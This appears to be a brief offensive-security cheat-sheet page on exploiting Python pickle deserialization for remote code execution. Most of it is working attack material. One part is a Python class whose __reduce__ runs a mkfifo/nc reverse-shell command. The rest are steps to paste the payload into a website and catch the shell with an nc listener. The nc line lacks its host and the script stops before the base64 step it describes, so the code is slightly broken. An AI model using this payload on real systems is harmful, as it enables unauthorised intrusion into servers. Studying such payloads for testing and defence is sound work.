Python Pickle RCE

Last modified: 2023-08-10


The python “pickle” module, that serializes and deserializes a Python object, is vulnerable to remote code execution. If the website uses this module, we may be able to execute arbitrary code.


Below is the Python script ( to generate the payload to reverse shell.

import pickle
import base64
import os

class RCE:
    def __reduce__(self):
        cmd = ('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 4444 > /tmp/f')
        return os.system, (cmd,)

if __name__ == '__main__':
    pickled = pickle.dumps(RCE())
    # or

Now run this script to generate the Base64 payload.


Copy the ourput base64 string and paste it to where the payload affects in website.
Before reloading the web page, start a listener in local machine.

nc -lvnp 4444

Then reload the page. We should get a shell in local terminal.